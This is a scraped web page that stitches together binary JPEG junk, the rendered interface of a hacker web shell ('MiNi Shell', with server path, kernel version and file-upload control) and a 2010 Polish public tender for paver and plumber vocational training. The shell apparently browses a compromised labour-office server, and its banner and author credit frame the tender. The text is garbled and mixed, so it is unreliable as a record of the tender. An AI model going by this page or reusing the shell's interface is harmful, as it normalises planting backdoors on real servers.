JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100715/211658-N-2010.html

<p class="kh_header"><b>Ostróda: Przedmiotem Zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego usługi szkolenia zawodowego CPV 80423000-5 w zakresie następujących szkoleń:
1.	Brukarz - grupa 10 - osobowa.
2.	Hydraulik (monter instalacji i urządzeń sanitarnych) - grupa 12-osobowa.</b><br>
<b>Numer ogłoszenia: 211658 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Mickiewicza 32, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 0-89 646-42-92, faks 0-89 646-29-56.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem Zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego usługi szkolenia zawodowego CPV 80423000-5 w zakresie następujących szkoleń:
1.	Brukarz - grupa 10 - osobowa.
2.	Hydraulik (monter instalacji i urządzeń sanitarnych) - grupa 12-osobowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonawca w ramach przedmiotu zamówienia między innymi musi:
1.	zabezpieczyć salę do zajęć teoretycznych wyposażoną w urządzenia niezbędne do prawidłowej realizacji zajęć;
2.	zapewnić odpowiednie warunki socjalne i sanitarne oraz bhp i ppoż dla sal i miejsc, w których będą prowadzone zajęcia i odbywały się praktyki;
3.	zabezpieczyć niezbędne do przeprowadzenia zajęć praktycznych narzędzia, urządzenia, maszyny, itp.
4.	w trakcie zajęć zapewnić uczestnikom szkoleń poczęstunek w formie: kawy, herbaty, wody mineralnej i zimnych napojów;
5.	przeprowadzić teoretyczny i praktyczny egzamin końcowy;
6.	uczestnikom szkoleń wydać zaświadczenia zgodne ze wzorem stanowiącym załącznik nr 1 do rozporządzenie Ministra Edukacji I Nauki z dnia 3 lutego 2006 r. W sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z dnia 27 lutego 2006 r.);
7.	wyposażyć uczestników szkolenia w niezbędną odzież ochronną do zajęć praktycznych;
8.	wyposażyć uczestników szkolenia w materiały biurowe, tj. długopisy, notatniki, ołówki, gumki do ścierania;
9.	przygotować identyfikatory dla uczestników szkoleń;
10.	prowadzić stały nadzór nad przebiegiem szkolenia;
11.	prowadzić dokumentację księgową szkolenia w postaci: faktur zakupu, umów zlecenia, rachunków, itp. poświadczających poniesione wydatki;
12.	prowadzić dokumentację przebiegu szkolenia w postaci: dzienników zajęć wypełnianych codziennie w oparciu o realizowany program zajęć i frekwencję uczestników szkolenia, imiennej listy obecności, list potwierdzonych przez uczestników szkolenia wydania materiałów biurowych, dydaktycznych, odzieży ochronnej, itp.;
Zasady ogólne organizacji szkoleń:
Każde ze szkoleń musi odbywać się codziennie w godzinach 7.30-15.00, od poniedziałku do piątku, oprócz soboty i niedzieli, po co najmniej 8 godzin dydaktycznych dziennie (jedna godzina dydaktyczna to 45 min.). Szkolenia mają być oparte o metody wykorzystujące zastosowanie kwestionariuszy, ćwiczeń, przykładów praktycznych, gier szkoleniowych, zajęć symulacyjnych i innych metod szkoleniowych, w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia. Szkolenia, zarówno cześć teoretyczna, jak i praktyczna, muszą być organizowane w odpowiednich pomieszczeniach i miejscach z zapewnionym zapleczem do przeprowadzenia szkolenia, zgodnie z wymaganiami polskiego prawa, tj. posiadać odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe oraz wyposażone w niezbędne pomoce dydaktyczne. Każdy uczestnik szkolenia po jego zakończeniu musi otrzymać zaświadczenie zgodnie ze wzorem stanowiącym załącznik nr 1 do rozporządzenie Ministra Edukacji I Nauki z dnia 3 lutego 2006 r. W sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z dnia 27 lutego 2006 r.). Na szkoleniach trzeba prowadzić imienną listę obecności, dziennik zajęć, wypełniany codziennie zgodnie z zaproponowanym programem i harmonogramem, listy potwierdzone przez uczestników szkolenia wydanych materiałów biurowych, dydaktycznych, odzieży ochronnej, itp. Dla każdego ze szkoleń należy prowadzić wyodrębnioną dokumentację księgową poniesionych wydatków w formie faktur, rachunków, umów zlecenia, itp.
Dodatkowo program zajęć z zakresu bhp musi zostać przygotowany w oparciu o Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 lipca 2004 r. w sprawie szkolenia w dziedzinie bezpieczeństwa i higieny pracy (Dz. U. z dnia 18 sierpnia 2004 r. z późn. zm.) oraz uczestnicy szkolenia muszą otrzymać zaświadczenie zgodne ze wzorem stanowiącym załącznik nr 3 do Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 lipca 2004 r. w sprawie szkolenia w dziedzinie bezpieczeństwa i higieny pracy (Dz. U. z dnia 18 sierpnia 2004 r. z późn. zm.).
Zasady szczególne organizacji szkolenia:
Część pierwsza przedmiotu zamówienia: Brukarz.
Szkoleniem zostanie objęta grupa 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Urząd dla zajęć praktycznych w zakresie wykonywania prac brukarskich zabezpiecza miejsce praktyk. Na zakup materiałów do przeprowadzenia części praktycznej należy przeznaczyć kwotę w wysokości 5000,00 złotych. Szkolenie musi zostać przeprowadzone w wymiarze 168 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - zajęcia teoretyczne z zakresu nauki zawodu brukarza,
120 godz. zajęcia praktyczne z zakresu wykonywania prac brukarskich.
Konieczność wydania osobnego zaświadczenia o odbyciu szkolenia brukarza.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu brukarza, a więc absolwent szkolenia musi, co najmniej nabyć niżej opisane umiejętności i wiadomości.
Umiejętności: 
-Stosuje odzież ochronną oraz środki ochrony osobistej podczas robót brukarskich. 
-Planuje wykonanie poszczególnych etapów zadania zgodnie z przebiegiem procesu technologicznego.
- Wykonuje podstawowe obliczenia związane z zadaniami zawodowymi.
- Organizuje stanowisko pracy (materiały i narzędzia) zgodnie z kolejnością wykonywanych czynności technologicznych.
- Sporządza plan działania.
- Dobiera elementy budowlane do zaplanowanych rozwiązań technicznych.
- Planuje w czasie czynności technologiczne uwzględniając cechy i właściwości poszczególnych materiałów oraz specyfikę podłoża.
- Posługuje się dokumentacją techniczną związaną z robotami brukarskimi.
- Sporządza wykaz niezbędnych materiałów, sprzętu pomiarowego i narzędzi.
- Posługuje się narzędziami ręcznymi i mechanicznymi oraz podstawowymi przyrządami pomiarowymi (łatą, poziomnicą, wężem wodnym, niwelatorem).
- Wykorzystuje przyrządy pomiarowe.
- Stosuje materiały dopuszczone do obrotu i stosowania.
- Używa narzędzi dopuszczonych do stosowania na podstawie odpowiednich przepisów.
- Etapuje pracę z uwzględnieniem czynności wykonywanych przez innych pracowników.
- Współpracuje z pracownikami wykonującymi roboty towarzyszące, w tym: betoniarskie, zbrojarskie, ciesielskie i instalatorskie.
- Przekazuje wiedzę teoretyczną i umiejętności praktyczne adeptom zawodu.
- Gromadzi i rozmieszcza na stanowisku pracy narzędzia, sprzęt i aparaturę pomiarową zgodnie z zasadami BHP i ochrony przeciwpożarowej.
- Transportuje i składuje materiały do robót brukarskich.
- Oblicza ilość poszczególnych elementów brukarskich, składników zaprawy lub betonu koniecznych do robót brukarskich na podstawie receptury.
- Określa warunki atmosferyczne pozwalające na wykonanie określonych prac i dobiera odpowiednie materiały.
- Dobiera narzędzia i sprzęt oraz przyrządy pomiarowe do wykonywania prac brukarskich i towarzyszących.
- Dobiera materiały stosownie do właściwości gruntu, podłoża, obciążenia oraz panujących warunków atmosferycznych i klimatycznych.
Wiadomości:
-Odzież ochronna i środki ochrony osobistej przeznaczone dla brukarzy 
-Dokumentacja techniczna.
- Materiałoznawstwo, maszynoznawstwo, rysunek zawodowy, budownictwo ogólne, podstawowe zasady ochrony środowiska.
- Normy stosowane w budownictwie drogowym.
- Technologia produkcji kamiennych kostek brukowych, krawężników kamiennych, kamiennych płyt chodnikowych i produkcji betonowych kostek brukowych, budowa nawierzchni drogowych, obsługa urządzeń i narzędzi mechanicznych (m.in. zagęszczarki płytowej, piły tarczowej itp.).
- Normy i wymagania w zakresie wykonawstwa robót brukarskich i towarzyszących.
- Materiały do wykonywania prac brukarskich i budowlanych oraz zasady ich stosowania z uwzględnieniem wpływu warunków klimatycznych.
Część druga przedmiotu zamówienia: Hydraulik (monter instalacji i urządzeń sanitarnych).
Szkoleniem zostanie objęta grupa 12 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Ostródzie. Szkolenie musi zostać przeprowadzone w wymiarze 168 godzin dydaktycznych na osobę. Program szkolenie musi zawierać następujące moduły szkoleniowe: 
8 godz. -  szkolenie z zakresu bhp - konieczność wydania osobnego zaświadczenia o odbyciu szkolenia,
40 godz. - zajęcia teoretyczne z zakresu nauki teorii zawodu montera instalacji i urządzeń sanitarnych,
120 godz. zajęcia praktyczne z zakresu wykonywania prac montera instalacji i urządzeń sanitarnych.
Konieczność wydania osobnego zaświadczenia o odbyciu kursu zawodowego montera instalacji i urządzeń sanitarnych.
Celem kursu jest przygotowanie jego absolwentów do wykonywania zawodu hydraulika, a więc absolwent szkolenia musi, co najmniej nabyć niżej opisane umiejętności i wiadomości.
UMIEJĘTNOŚCI:
-	Stosuje odzież ochronną oraz środki ochrony osobistej podczas prac. 
-	Analizuje i interpretuje schematy i instrukcje obsługi maszyn i aparatów stosowanych w technice sanitarnej.
-	Trasuje instalacje sanitarne.
-	Wykonuje proste prace budowlane.
-	Wykonuje wykopy w różnych rodzajach gruntu.
-	Wykonuje bruzdy i otwory w murach oraz inne prace pomocnicze i przygotowawcze.
-	Wykonuje przecinanie wyrobów hutniczych za pomocą narzędzi ręcznych i mechanicznych.
-	Wykonuje otwory na kołki rozporowe, śruby i nity.
-	Ustala zakres robót.
-	Ustala kolejność wykonywanych robót.
-	Ustala odpowiednią metodę montażu.
-	Czyta i analizuje rysunki instalacji sanitarnych.
-	Dokonuje przeglądu instalacji sanitarnych. 
-	Typuje instalacje sanitarne do remontu. 
-	Naprawia instalacje i urządzenia sanitarne. 
-	Kontroluje jakość wykorzystywanych materiałów.
-	Dokonuje odbioru technicznego wykonanej instalacji.
-	Zabezpiecza antykorozyjnie przewody.
-	Izoluje cieplnie przewody instalacji sanitarnych.
-	Wykonuje złącza gwintowane rur stalowych.
-	Wykonuje złącza rur miedzianych za pomocą lutowania.
-	Wykonuje złącza rur miedzianych przez kielichowanie końca rury.
-	Wykonuje złącza zgrzewane rur z tworzyw sztucznych.
-	Wykonuje złącza klejone rur z tworzyw sztucznych.
-	Wykonuje złącza kielichowe rur z tworzyw sztucznych.
-	Wykonuje złącza rur miedzianych przy użyciu łączników miedzianych, mosiężnych.
-	Wykonuje złącza kołnierzowe rur stalowych, miedzianych i z tworzyw sztucznych. 
-	Wykonuje inne złącza rur z tworzyw sztucznych.
-	Wykonuje kompensację termiczną dla rur z tworzyw sztucznych, stalowych i miedzianych.
-	Montuje przewody wodociągowe z rur stalowych ocynkowanych lub z prostych rur z tworzywa sztucznego, łączonych na gwint za pomocą złączek.
-	Montuje rury stalowe w budynku.
-	Montuje przewody instalacyjne miedziane w budynku.
-	Montuje przewody instalacyjne z tworzyw sztucznych w budynku.
-	Montuje przewody instalacji rozprowadzającej wodę do picia lub celów technologicznych, od wodomierza albo od wejścia przewodu do budynku - do armatury czerpalnej.
-	Montuje urządzenia wraz z uzbrojeniem instalacji rozprowadzającej wodę do picia lub celów technologicznych.
-	Montuje filtry i urządzenia stosowane do uzdatniania wody.
-	Montuje domowe zestawy hydroforowe.
-	Wykonuje połączenie przewodów, armatury i urządzeń przyłącza wodociągowego.
-	Montuje w instalacji wodociągowej urządzenia do pomiaru przepływu wody z zachowaniem wymagań technicznych, takich jak łatwość dostępu, odpowiednie oświetlenie oraz wyposażenie pomieszczeń we wpusty piwnic.
-	Montuje podgrzewacze ciepłej wody.
-	Montuje urządzenia sprężarkowej pompy ciepła. 
-	Przyłącza pompę ciepła do instalacji klimatyzacyjnej, centralnego ogrzewania lub ciepłej wody.
-	Płucze instalacje wodociągowe.
-	Dezynfekuje instalacje wodociągowe.
-	Montuje wodne instalacje przeciwpożarowe.
-	Montuje instalacje odprowadzające wody deszczowe z wpustów deszczowych dachowych i powierzchniowych do kanalizacji miejskiej.
-	Montuje przewody kanalizacyjne (z rur żeliwnych, kamionkowych lub z PCV i PP) i urządzenia wraz z uzbrojeniem instalacji odprowadzającej ścieki, od przyborów sanitarnych i urządzeń technologicznych znajdujących się wewnątrz budynku do pierwszej studzienki rewizyjnej za budynkiem.
-	Wykonuje połączenia przewodów i uzbrojenia przyłącza kanalizacyjnego.
-	Montuje przybory sanitarne i wpusty podłogowe.
-	Montuje łapacze tłuszczów, osadniki i inne specjalne urządzenia kanalizacyjne.
-	Wykonuje prace konserwatorskie instalacji centralnego ogrzewania i instalacji ciepłej wody, polegające na sprawdzaniu działania mierników temperatury, ciśnienia i natężenia przepływu wody ciepłej i zimnej, zaworów odcinających, pomp cyrkulacyjnych itp.
-	Wykonuje prace konserwatorskie instalacji wodociągowo-kanalizacyjnej polegające na oględzinach stanu technicznego instalacji oraz urządzeń i armatury stanowiącej jej wyposażenie.
-	Remontuje i oczyszcza studnie kopane i wiercone typu abisyńskiego.
-	Konserwuje sprzęt używany do czerpania wody i obudowy studni.
-	Wykonuje próbę szczelności wykonanej instalacji wodociągowej.
-	Wykonuje badanie szczelności wykonanej instalacji kanalizacyjnej.
-	Zabezpiecza przewody antykorozyjnie.
WIADOMOŚCI:
-	Odzież ochronna i środki ochrony osobistej przeznaczone dla monterów instalacji sanitarnych. 
-	Roboty ziemne w budownictwie.
-	Technologia ręcznych robót ziemnych.
-	Warunki techniczne wykonania robót instalacyjno-montażowych. 
-	Izolacje cieplne przewodów instalacji sanitarnych.
-	Studnie. 
-	Źródła wody i jej ujęcia.
-	Uzdatnianie wody.
-	Instalacje wodociągowe.
-	Instalacje kanalizacyjne.
-	Korozja metali.
Odbiór wykonanych usług następuje na podstawie przedłożonych zamawiającemu kserokopii zaświadczeń i certyfikatów wydanych uczestnikom szkolenia, list obecności, list potwierdzających otrzymane materiały dydaktyczne, biurowe, odzież ochronną, itp. oraz kontroli przeprowadzonej przez zamawiającego w zakresie sprawdzenia poniesionych wydatków finansowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.42.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 17.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli wykonawca posiada aktualny wpis do rejestru instytucji szkoleniowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził, co najmniej dwa szkolenia grupowe, dla grup, co najmniej 10-osobowych każda, które swoim zakresem obejmowały jednocześnie naukę teoretyczną i praktyczną zawodu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli wykonawca w części, o którą się ubiega odpowiednio dysponuje:
	dla każdej z części zamówienia: salą wykładową do przeprowadzenia zajęć teoretycznych,
	dla części drugiej przedmiotu zamówienia: miejscem, w którym zostaną przeprowadzone zajęcia praktyczne,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli wykonawca w części, o którą się ubiega odpowiednio dysponuje:
	dla każdej z części zamówienia: co najmniej jednym wykładowcą bhp,
	dla każdej części zamówienia: co najmniej jednym trenerem do zajęć praktycznych, 
	dla każdej z części zamówienia: co najmniej jednym wykładowcą do przeprowadzenia zajęć z teorii zawodu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie wykonywanej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Certyfikaty jakości usług - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zakresie terminu realizacji usługi i zmiejszenia ilości osób objętych usługą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.ostroda.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Ostródzie 14-100 Ostróda ul. Mickiewicza 32..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Ostródzie 14-100 Ostróda ul. Mickiewicza 32. pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com